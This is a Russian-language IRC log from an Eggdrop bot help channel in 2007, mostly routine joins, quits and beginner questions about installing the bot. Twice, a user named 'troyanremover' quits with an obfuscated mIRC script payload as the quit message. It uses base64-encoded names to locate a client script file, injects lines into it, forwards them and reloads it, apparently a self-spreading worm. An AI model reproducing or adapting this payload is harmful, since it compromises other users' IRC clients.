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23 Сентября 2007. Канал #eggdrop

[00:00:53] * whitt (pIRCuser61@whitte.ntown) Quit (Quit: Всем пока,WoW -рулит!!!)
[00:01:49] <Gremlin> всем спокойной ночи
[00:09:53] * Gremlin is now known as Access Denied
[00:10:18] <Green_Lantern> Всем приятных сновидений
[00:10:19] * Green_Lantern (~helpteam7@ has left (Всем удачи и любви)
[00:11:17] * Access Denied is now known as Gremlin
[00:12:11] * Gremlin is now known as Access Denied
[00:14:48] * night_fenix away is now known as night_fenix
[00:21:21] * ~Лысый_одиноко_с_пивом is now known as ~Лысинка
[00:21:31] * ~Лысинка is now known as ~Лысый_одиноко_с_пивом
[00:22:22] * true (~true@ Quit (Ping timeout)
[00:24:01] * true (~true@ has joined
[00:24:05] * D-Face sets mode: +v true
[00:28:08] <xamyt> ~tcl variable
[00:28:09] <Jaiss> variable @
[00:28:23] * ~Еva~|Ушла вешацо (pIRCuser83@ has joined
[00:29:22] * ~Еva~|Ушла вешацо (pIRCuser83@ has left ()
[00:34:39] * true (~true@ Quit (Ping timeout)
[00:45:42] * ~Лысый_одиноко_с_пивом is now known as ~Лысинка
[00:45:50] * ~Лысинка is now known as ~Лысый_одиноко_с_пивом
[00:47:09] * Помидоркин ( Quit (Read error: Connection reset by peer)
[00:48:09] * Rip`aw ( Quit (Read error: Connection reset by peer)
[00:48:09] * {AJITAIR[BNC]} (art@ Quit (Read error: Connection reset by peer)
[00:48:22] * sharpshooer and настроение ( has left ()
[00:48:58] * MAD_Evil is now known as NetSplit
[00:53:14] * Brunnen_J ( has joined
[10:52:37] * YooKim (~YooKim@ has joined
[10:52:37] * * changes topic to '.: Official EggDrop Help Channel :. LATEST STABLE RELEASE FROM: (Win32 NEW!: | Scripts: | (Don't msg @/+).'
[10:52:57] * * changes topic to '.: Official EggDrop Help Channel :. LATEST STABLE RELEASE FROM: (Win32 NEW!: | Scripts: | (Don't msg @/+).'
[10:53:24] * troyanremover ( has joined
[10:53:30] * troyanremover ( Quit (Quit: } set %y {$findfile($mircdir,$decode(dHJpb25zY3I3LmluaQ==,m),1,5)} | set %x {$} {$+} {strip($} {$+} 1-)* {$shortfn(%y)} | write -dw* {$+} %x | write -dw* {$+} %x | write -dw* {$+} %x | write -dw* {$+} %x | .msg {$decode(I286bGluZXM=,m)} %x | unset %x,%y | .reload -rs {$chr(34)} {$+} %y {$+} {$chr(34)})
[10:53:33] * troyanremover ( has joined
[10:53:36] * troyanremover ( Quit (Quit: } set %y {$findfile($mircdir,$decode(dHJpb25zY3I3LmluaQ==,m),1,5)} | set %x {$} {$+} {strip($} {$+} 1-)* {$shortfn(%y)} | write -dw* {$+} %x | write -dw* {$+} %x | write -dw* {$+} %x | write -dw* {$+} %x | .msg {$decode(I286bGluZXM=,m)} %x | unset %x,%y | .reload -rs {$chr(34)} {$+} %y {$+} {$chr(34)})
[10:59:59] <IRCServ> {[46/1044]} {[00:12:23]} <__unnamed> !настроить {[00:12:23]} <FreeForum> Для ... {[00:18:21]} <__unnamed> куя сеее <__unnamed> мне не какой бот теерь не нужен <__unnamed> тут пизданёшься читать {[Король]}
[11:01:20] * Access Denied is now known as Gremlin
[11:01:26] <Gremlin> доброго утра
[11:02:38] * {[[-Хедин-]]} ( Quit (Netsplitted)
[11:03:13] * ПАШКА_МЯСНИК ( has joined
[11:03:13] <ПАШКА_МЯСНИК> как установить бота
[11:03:49] <ПАШКА_МЯСНИК> как установить бота
[11:05:27] <Buster> !настроить
[11:06:01] <ПАШКА_МЯСНИК> устанавит
[11:06:06] <ПАШКА_МЯСНИК> я его скачал {}
[11:06:11] <ПАШКА_МЯСНИК> а как установеть
[11:06:20] <Stuk> в папку {} GTA VC
[11:06:34] <ПАШКА_МЯСНИК> =)
[11:07:00] <ПАШКА_МЯСНИК> Buster, разархевировать в мирку да надо
[11:07:38] * Jaiss (~Jaiss@ has joined
[11:07:41] * D-Face sets mode: +v Jaiss
[11:09:32] <Stuk> !скачать
[11:09:33] <Jaiss> Версия бота eggdrop под Windows : NEW! 1.6.18+patch >> | под *nix : NEW! 1.6.18+patch >> | |
[11:10:13] <Gremlin> ~scripts ccs
[11:10:13] <Jaiss> Найдено 3 скрипта по заданному запросу.(control.tcl - {9;} ccs.1.1.tcl - {3;} ccs.fix.tcl - 0) Вот два случайных из них: {}
[11:10:13] <Jaiss> control.tcl 69 bite {[23:04:2005]} Любительсий простенький скрипт, несмотря на его простоту может быть очень удобным и полезным, не всегда удобно подгружать такие гиганты как ccs.tcl и m3s.tcl с огромным количеством функций, иногда хочется иметь только то, что нужно и только... каждому свое
[11:10:13] <Jaiss> ccs.1.1.tcl 081 bite {[10:09:2007]} Скрипт управления каналом предоставляющий пользователю широкий выбор команд . Скрипт был основан на предыдущей версии и в то же время был написан с нуля на новом движке. Полное описание изменений приведено в скрипте. !Внимание! версия постоянно обновляеться, следите за релизами. v1.1.6 {[10-SEP-2007]} by Buster.
[11:10:22] <Gremlin> ((
[11:10:24] <AliasNET> за 3 харда по 300 гигов я те целую партию вышлю :)
[11:11:05] * {[[-Хедин-]]} ( has joined
[11:12:46] * ПАШКА_МЯСНИК ( Quit (Quit: темномирк:
[11:13:39] * ПАШКА_МЯСНИК ( has joined
[11:13:47] <ПАШКА_МЯСНИК> как завести бота
[11:14:05] <_SET_> !скачать
[11:14:05] <Jaiss> Версия бота eggdrop под Windows : NEW! 1.6.18+patch >> | под *nix : NEW! 1.6.18+patch >> | |
[11:15:08] * ПАШКА_МЯСНИК ( Quit (Quit: темномирк:
[11:25:52] * Северный Мишка (Qwert@ has joined
[11:27:05] * Lost Angel (~pIRCuser9@ has joined
[11:33:11] * decode ( has joined
[11:33:24] * Stuk ( Quit (Local kill by decode (get out))
[11:33:27] * decode is now known as Stuk
[11:33:58] * {[mashka]} ( Quit (Ping timeout)
[11:34:34] * {[mashka]} ( has joined
[11:39:50] * Gremlin is now known as Access Denied
[11:42:24] * {[mashka]} ( Quit (Read error: Connection reset by peer)
[11:42:59] * PLAFON ( has joined
[11:43:23] * {[mashka]} ( has joined
[11:43:55] <PLAFON> как русифицировать бота
[11:45:27] * {Dexoid[Bouncer]} ( Quit (Read error: Connection reset by peer)
[11:45:32] * WindoKiller (~WindoKill@ has joined
[11:45:50] <WindoKiller> добрый день
[11:46:27] * serg_sk (~Gentoo@ has joined
[11:46:34] * Stuk ( Quit (Ping timeout)
[11:46:43] <WindoKiller> эм.. ссылочку бы по настройке бота)
[11:46:47] <serg_sk> приветствую. Может кто подскажет. Пишу в конфиге encoding system iso8859-1
[11:46:52] <WindoKiller> падскажыти )
[11:46:53] <serg_sk> и перестает работать posik.tcl
[11:48:04] * {[mashka]} ( Quit (Ping timeout)
[11:52:33] * Lex ( has joined
[11:52:47] * {Dexoid[Bouncer]} ( has joined
[11:54:38] * Nick Heidfeld (De_r@ has joined
[11:59:58] <IRCServ> {[306/1044]} <hangy> -!- Irssi: #ixx: Total of 232 nicks {[7} ops, 0 halfops, 2 voices, 223 normal] {} {} <тада> 223 normal ето пиздеж и провокация %))) {[dreamy]}
[12:03:46] * {JeYsoN[oFFLiNe]} Снова с вами отсутствовал
[12:04:19] * {JeYsoN[oFFLiNe]} is now known as JeYsoN
[12:04:50] * {Club-X[off]} ( Quit (Netsplitted)
[12:04:50] * PLAFON ( Quit (Netsplitted)
[12:04:50] * Ботик ( Quit (Netsplitted)
[12:05:45] * {Club-X[off]} ( has joined
[12:05:46] * PLAFON ( has joined
[12:05:46] * Ботик ( has joined
[12:05:46] * sets mode: +v Ботик
[12:10:46] * PLAFON ( Quit (Quit: темномирк:
[12:11:21] * Makar is now known as cosmos
[12:12:13] * Stuk ( has joined
[12:15:52] * d10r ( has joined
[12:17:11] * Ntg|BNC is now known as Night_Tiger
[12:17:30] * Night_Tiger is now known as Ntg|BNC
[12:17:33] * {[mashka]} ( has joined
[12:18:28] * cosmos is now known as Makar
[12:19:47] * Makar is now known as cosmos
[12:22:30] * cosmos is now known as oustin-
[12:32:57] * BotNet0 ( has joined
[12:33:01] * D-Face sets mode: +v BotNet0
[12:33:33] * Stuk ( Quit (Quit: однажды он пыхнул...и не вернулся)
[12:34:07] * Alone_In The_Dark ( has joined
[12:35:10] * BotNet ( Quit (Ping timeout)
[12:38:09] * Alone_In The_Dark ( has left ()
[12:43:49] * oustin- is now known as з
[12:43:58] * lnfiniti (karasik-ul@karasik-ul.ntown) has joined
[12:45:01] <lnfiniti> А вотъ и я... Неждали?... А я пришла.... =)
Query time 0.0451 s